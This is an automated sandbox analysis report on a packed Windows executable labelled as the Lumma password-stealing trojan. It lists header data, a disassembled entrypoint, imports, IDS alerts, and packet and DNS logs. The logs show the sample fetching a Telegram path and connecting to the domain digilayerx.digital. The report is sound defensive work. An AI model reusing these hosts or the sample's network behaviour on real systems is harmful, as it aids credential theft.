DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x680279C6 [Fri Apr 18 16:11:50 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	71cc5af9daad65e58c6f29c42cdf9201

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 00401000h
call 00007EFD44B1ED46h
call far 5DE5h : 8B10C483h
jmp 00007EFD44ECDA2Eh
add al, AAh
add eax, 527C2A8Ah
push es
pop ss
lahf
mov ecx, 5F227643h
sti
pushad
mov bl, BBh
xchg ebp, edx
jl 00007EFD44B1ED47h
mov word ptr [ebx-3Ch], seg?
mov word ptr [ecx+edx], seg?
adc cl, byte ptr [eax]
lds esi, fword ptr [esi]
xchg eax, esp
dec edi
sub byte ptr [esi+ebx+00FCF22Ch], FFFFFF9Bh
in al, dx
sbb eax, dword ptr [edi]
add ch, byte ptr [edx-7B0E1770h]
cmp al, byte ptr [edi]
mov ebp, 1D2A60D6h
stosb
adc bh, byte ptr [edi+ebp*8-2C6203F4h]
cmpsd
add edx, dword ptr [edx-7ECA9F56h]
add al, D8h
or al, C7h
push 62EC8457h
cmp esi, esi
outsb
jne 00007EFD44B1EDA8h
mov ch, B7h
mov edi, F40F39C1h
sub byte ptr [ebp-58052F94h], FFFFFFB1h
adc al, CAh
pop eax
mov ecx, 00288D1Dh
adc eax, 484D1D39h
salc
in al, dx
je 00007EFD44B1ECE6h
dec esp
lahf
call far 28F4h : B74B7DE4h
push esp
sbb ch, ah
xor dword ptr [edi-2Eh], ebx
in eax, 59h
add ecx, dword ptr [edx-473D4DE1h]
jc 00007EFD44B1ED0Dh
scasd
jnl 00007EFD44B1ED8Fh
cmp cl, cl
push FFFFFF84h
cmp word ptr [edi+3Eh], dx
or al, C4h
sub al, 41h
daa
cld
nop
aad 23h
dec eax
in al, ABh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2e0020	0x214	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2e0000	0xc	.data
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x4d000	0x28800	6a2f1d86e819c6245e7440dab3b52bde	False	0.9982216917438271	data	7.997633358713137	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x4e000	0x2000	0x1000	2a4818bcaafa6de44cc211eba95b2b75	False	0.993408203125	data	7.919464848399906	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x50000	0xd000	0x1e00	15b1b3c545611eed1fea7dd0e3c5ab2c	False	0.9912760416666667	data	7.957147686858089	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x5d000	0x4000	0x1c00	5b55e8ecb02db14436a1a8221d3f1b71	False	0.9585658482142857	data	7.847501207798942	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x61000	0x27f000	0x2ba00	dbdaceb8d926fc51d8a51dfb68b056b4	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data	0x2e0000	0xe5000	0xe4800	83948ffb3f403457905e47d2a1ddce34	False	0.9971226665071116	data	7.985696138467327	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	GetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
user32.dll	MessageBoxA
advapi32.dll	RegCloseKey
oleaut32.dll	SysFreeString
gdi32.dll	CreateFontA
shell32.dll	ShellExecuteA
version.dll	GetFileVersionInfoA
ole32.dll	CoCreateInstance

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-04-25T08:55:18.557531+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49689	149.154.167.99	443	TCP
2025-04-25T08:55:19.758133+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49690	172.67.146.208	443	TCP
2025-04-25T08:55:21.741411+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49691	172.67.146.208	443	TCP
2025-04-25T08:55:23.893013+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49695	172.67.146.208	443	TCP
2025-04-25T08:55:25.520213+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49696	172.67.146.208	443	TCP
2025-04-25T08:55:28.097754+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49697	172.67.146.208	443	TCP
2025-04-25T08:55:29.454756+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49698	172.67.146.208	443	TCP
2025-04-25T08:55:32.189050+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49699	172.67.146.208	443	TCP

Network Port Distribution

Total Packets: 111
• 443 (HTTPS)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 25, 2025 08:55:17.994199038 CEST	49689	443	192.168.2.5	149.154.167.99
Apr 25, 2025 08:55:17.994242907 CEST	443	49689	149.154.167.99	192.168.2.5
Apr 25, 2025 08:55:17.994321108 CEST	49689	443	192.168.2.5	149.154.167.99
Apr 25, 2025 08:55:17.995816946 CEST	49689	443	192.168.2.5	149.154.167.99
Apr 25, 2025 08:55:17.995836020 CEST	443	49689	149.154.167.99	192.168.2.5
Apr 25, 2025 08:55:18.557460070 CEST	443	49689	149.154.167.99	192.168.2.5
Apr 25, 2025 08:55:18.557531118 CEST	49689	443	192.168.2.5	149.154.167.99
Apr 25, 2025 08:55:18.560493946 CEST	49689	443	192.168.2.5	149.154.167.99
Apr 25, 2025 08:55:18.560503006 CEST	443	49689	149.154.167.99	192.168.2.5
Apr 25, 2025 08:55:18.560770988 CEST	443	49689	149.154.167.99	192.168.2.5
Apr 25, 2025 08:55:18.608577013 CEST	49689	443	192.168.2.5	149.154.167.99
Apr 25, 2025 08:55:18.615861893 CEST	49689	443	192.168.2.5	149.154.167.99
Apr 25, 2025 08:55:18.660284042 CEST	443	49689	149.154.167.99	192.168.2.5
Apr 25, 2025 08:55:19.132752895 CEST	443	49689	149.154.167.99	192.168.2.5
Apr 25, 2025 08:55:19.132781982 CEST	443	49689	149.154.167.99	192.168.2.5
Apr 25, 2025 08:55:19.132790089 CEST	443	49689	149.154.167.99	192.168.2.5
Apr 25, 2025 08:55:19.132823944 CEST	443	49689	149.154.167.99	192.168.2.5
Apr 25, 2025 08:55:19.132860899 CEST	49689	443	192.168.2.5	149.154.167.99
Apr 25, 2025 08:55:19.132883072 CEST	443	49689	149.154.167.99	192.168.2.5
Apr 25, 2025 08:55:19.132895947 CEST	49689	443	192.168.2.5	149.154.167.99
Apr 25, 2025 08:55:19.132905960 CEST	443	49689	149.154.167.99	192.168.2.5
Apr 25, 2025 08:55:19.132934093 CEST	49689	443	192.168.2.5	149.154.167.99
Apr 25, 2025 08:55:19.133008003 CEST	49689	443	192.168.2.5	149.154.167.99
Apr 25, 2025 08:55:19.135361910 CEST	49689	443	192.168.2.5	149.154.167.99
Apr 25, 2025 08:55:19.135377884 CEST	443	49689	149.154.167.99	192.168.2.5
Apr 25, 2025 08:55:19.135411978 CEST	49689	443	192.168.2.5	149.154.167.99
Apr 25, 2025 08:55:19.135417938 CEST	443	49689	149.154.167.99	192.168.2.5
Apr 25, 2025 08:55:19.455607891 CEST	49690	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:19.455653906 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:19.455954075 CEST	49690	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:19.465133905 CEST	49690	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:19.465152979 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:19.758047104 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:19.758132935 CEST	49690	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:19.771759033 CEST	49690	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:19.771773100 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:19.771971941 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:19.785406113 CEST	49690	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:19.785439968 CEST	49690	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:19.785471916 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.546092033 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.546144962 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.546191931 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.546195984 CEST	49690	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:20.546211004 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.546247959 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.546269894 CEST	49690	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:20.546276093 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.546334028 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.546355009 CEST	49690	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:20.546359062 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.546410084 CEST	49690	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:20.546860933 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.566243887 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.566277981 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.566307068 CEST	49690	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:20.566327095 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.566364050 CEST	49690	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:20.725395918 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.725455046 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.725483894 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.725498915 CEST	49690	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:20.725512028 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.725548983 CEST	49690	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:20.725963116 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.726136923 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.726190090 CEST	49690	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:20.726195097 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.726257086 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.726291895 CEST	49690	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:20.726296902 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.726748943 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.726790905 CEST	49690	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:20.726794958 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.726825953 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.726877928 CEST	49690	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:20.726882935 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.727516890 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.727543116 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.727566957 CEST	49690	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:20.727571964 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.727632999 CEST	49690	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:20.727655888 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.727746964 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.727788925 CEST	49690	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:20.728965998 CEST	49690	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:20.728981972 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:20.728998899 CEST	49690	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:20.729002953 CEST	443	49690	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:21.451996088 CEST	49691	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:21.452050924 CEST	443	49691	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:21.452150106 CEST	49691	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:21.452630997 CEST	49691	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:21.452645063 CEST	443	49691	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:21.741211891 CEST	443	49691	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:21.741410971 CEST	49691	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:21.742583990 CEST	49691	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:21.742595911 CEST	443	49691	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:21.742799044 CEST	443	49691	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:21.744241953 CEST	49691	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:21.744241953 CEST	49691	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:21.744281054 CEST	443	49691	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:21.744354010 CEST	49691	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:21.788275957 CEST	443	49691	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:22.666049004 CEST	443	49691	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:22.666173935 CEST	443	49691	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:22.666459084 CEST	49691	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:22.667102098 CEST	49691	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:22.667124987 CEST	443	49691	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:23.603334904 CEST	49695	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:23.603389978 CEST	443	49695	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:23.603666067 CEST	49695	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:23.603950977 CEST	49695	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:23.603965998 CEST	443	49695	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:23.892941952 CEST	443	49695	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:23.893013000 CEST	49695	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:23.894186020 CEST	49695	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:23.894196033 CEST	443	49695	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:23.894397020 CEST	443	49695	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:23.902812004 CEST	49695	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:23.902916908 CEST	49695	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:23.902945995 CEST	443	49695	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:23.903002977 CEST	49695	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:23.944283962 CEST	443	49695	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:24.696523905 CEST	443	49695	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:24.696635008 CEST	443	49695	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:24.696690083 CEST	49695	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:24.696906090 CEST	49695	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:24.696921110 CEST	443	49695	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:25.225481987 CEST	49696	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:25.225537062 CEST	443	49696	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:25.230873108 CEST	49696	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:25.231178045 CEST	49696	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:25.231194019 CEST	443	49696	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:25.518788099 CEST	443	49696	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:25.520212889 CEST	49696	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:25.520212889 CEST	49696	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:25.520241976 CEST	443	49696	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:25.520472050 CEST	443	49696	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:25.522465944 CEST	49696	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:25.522466898 CEST	49696	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:25.522505045 CEST	443	49696	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:25.525331974 CEST	49696	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:25.525346041 CEST	443	49696	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:26.364845037 CEST	443	49696	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:26.364963055 CEST	443	49696	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:26.365063906 CEST	49696	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:26.371527910 CEST	49696	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:26.371562004 CEST	443	49696	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:27.809333086 CEST	49697	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:27.809375048 CEST	443	49697	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:27.809453011 CEST	49697	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:27.809863091 CEST	49697	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:27.809876919 CEST	443	49697	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:28.097650051 CEST	443	49697	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:28.097754002 CEST	49697	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:28.099221945 CEST	49697	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:28.099231005 CEST	443	49697	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:28.099430084 CEST	443	49697	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:28.100769043 CEST	49697	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:28.100886106 CEST	49697	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:28.100938082 CEST	443	49697	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:28.670860052 CEST	443	49697	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:28.670970917 CEST	443	49697	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:28.671037912 CEST	49697	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:28.671350002 CEST	49697	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:28.671365023 CEST	443	49697	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:29.165420055 CEST	49698	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:29.165467024 CEST	443	49698	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:29.165570021 CEST	49698	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:29.165905952 CEST	49698	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:29.165921926 CEST	443	49698	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:29.454667091 CEST	443	49698	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:29.454756021 CEST	49698	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:29.464519024 CEST	49698	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:29.464529991 CEST	443	49698	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:29.464719057 CEST	443	49698	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:29.465966940 CEST	49698	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:29.466785908 CEST	49698	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:29.466815948 CEST	443	49698	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:29.466901064 CEST	49698	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:29.466928005 CEST	443	49698	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:29.467025042 CEST	49698	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:29.467055082 CEST	443	49698	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:29.467154026 CEST	49698	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:29.467164040 CEST	443	49698	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:29.467278957 CEST	49698	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:29.467302084 CEST	443	49698	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:29.467432022 CEST	49698	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:29.467457056 CEST	443	49698	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:29.467468023 CEST	49698	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:29.467601061 CEST	49698	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:29.467628956 CEST	49698	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:29.508272886 CEST	443	49698	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:29.508410931 CEST	49698	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:29.508445978 CEST	49698	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:29.508461952 CEST	49698	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:29.552268982 CEST	443	49698	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:29.552421093 CEST	49698	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:29.552459002 CEST	49698	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:29.552480936 CEST	49698	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:29.596266031 CEST	443	49698	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:29.596410036 CEST	49698	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:29.644272089 CEST	443	49698	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:29.889760017 CEST	443	49698	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:31.881772041 CEST	443	49698	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:31.881984949 CEST	49698	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:31.897728920 CEST	49699	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:31.897773027 CEST	443	49699	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:31.897855997 CEST	49699	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:31.898160934 CEST	49699	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:31.898176908 CEST	443	49699	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:32.188940048 CEST	443	49699	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:32.189049959 CEST	49699	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:32.196723938 CEST	49699	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:32.196738958 CEST	443	49699	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:32.197123051 CEST	443	49699	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:32.198323965 CEST	49699	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:32.198343039 CEST	49699	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:32.198416948 CEST	443	49699	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:32.752151012 CEST	443	49699	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:32.752207994 CEST	443	49699	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:32.752306938 CEST	49699	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:32.752517939 CEST	49699	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:32.752547026 CEST	443	49699	172.67.146.208	192.168.2.5
Apr 25, 2025 08:55:32.752567053 CEST	49699	443	192.168.2.5	172.67.146.208
Apr 25, 2025 08:55:32.752574921 CEST	443	49699	172.67.146.208	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 25, 2025 08:55:17.846975088 CEST	49378	53	192.168.2.5	1.1.1.1
Apr 25, 2025 08:55:17.987320900 CEST	53	49378	1.1.1.1	192.168.2.5
Apr 25, 2025 08:55:19.262258053 CEST	58868	53	192.168.2.5	1.1.1.1
Apr 25, 2025 08:55:19.449505091 CEST	53	58868	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 25, 2025 08:55:17.846975088 CEST	192.168.2.5	1.1.1.1	0x9cab	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Apr 25, 2025 08:55:19.262258053 CEST	192.168.2.5	1.1.1.1	0xe1de	Standard query (0)	digilayerx.digital	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Apr 25, 2025 08:55:17.987320900 CEST	1.1.1.1	192.168.2.5	0x9cab	No error (0)	t.me	149.154.167.99	A (IP address)	IN (0x0001)	false
Apr 25, 2025 08:55:19.449505091 CEST	1.1.1.1	192.168.2.5	0xe1de	No error (0)	digilayerx.digital	172.67.146.208	A (IP address)	IN (0x0001)	false
Apr 25, 2025 08:55:19.449505091 CEST	1.1.1.1	192.168.2.5	0xe1de	No error (0)	digilayerx.digital	104.21.10.223	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

digilayerx.digital

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49689	149.154.167.99	443	7972	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-25 06:55:18 UTC	64	OUT	GET /wermnjgk34 HTTP/1.1 Connection: Keep-Alive Host: t.me
2025-04-25 06:55:19 UTC	511	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 25 Apr 2025 06:55:18 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12251 Connection: close Set-Cookie: stel_ssid=af0686121de0562840_5552460219984370649; expires=Sat, 26 Apr 2025 06:55:18 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
